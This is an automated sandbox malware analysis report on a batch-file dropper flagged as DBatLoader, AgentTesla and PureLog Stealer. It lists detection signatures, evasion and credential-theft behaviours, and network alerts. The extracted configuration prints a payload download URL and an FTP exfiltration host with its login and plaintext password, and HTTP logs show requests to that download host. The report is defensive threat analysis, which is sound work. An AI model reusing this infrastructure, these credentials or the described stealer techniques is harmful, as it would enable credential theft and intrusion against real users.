Windows Analysis Report
z1Transaction_ID_REF2418_cmd.bat

Overview

General Information

Sample name:	z1Transaction_ID_REF2418_cmd.bat
Analysis ID:	1545203
MD5:	597443c0b1405f3deaa48eef7de516c4
SHA1:	8f3688a384a9a8c8f70fc6a19382d73fbded0674
SHA256:	553f1b4f0532c10e855e349a79d51c1fbffe6f9e03360e50b1445b82d1667ebb
Tags:	batuser-Porcupine
Infos:

Detection

AgentTesla, DBatLoader, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected DBatLoader

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Creates multiple autostart registry keys

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Found large BAT file

Hides that the sample has been downloaded from the Internet (zone.identifier)

Installs a global keyboard hook

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious Program Location with Network Connections

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Signatures

AV Detection

Found malware configuration

Source: z1Transaction_ID_REF2418_cmd.bat	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://himalayastrek.com/origins/233_Cllyjbrxmng"]}
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\x.exe	ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: z1Transaction_ID_REF2418_cmd.bat

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Unpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack

Source: unknown	HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49752 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.0000000003004000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003000000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021720000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021751000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_031C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	3_2_031C5908
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Code function: 13_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,	13_2_0040128D
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	Code function: 13_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,	13_2_00401612

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49744 -> 110.4.45.197:21
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49747 -> 110.4.45.197:54601
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49753 -> 110.4.45.197:21
Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49754 -> 110.4.45.197:63940

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://himalayastrek.com/origins/233_Cllyjbrxmng

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 110.4.45.197 ports 50707,62466,63940,62962,56275,55553,1,2,53369,54601,61195,21

Contains functionality to check if a connection to the internet is available

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031DE4B8 InternetCheckConnectionA,

3_2_031DE4B8

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49735 -> 110.4.45.197:50707

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 110.4.45.197 110.4.45.197
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Uses FTP

Source: unknown

FTP traffic detected: 110.4.45.197:21 -> 192.168.2.4:49734 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: himalayastrek.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ftp.haliza.com.my

Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029D6E000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.haliza.com.my
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
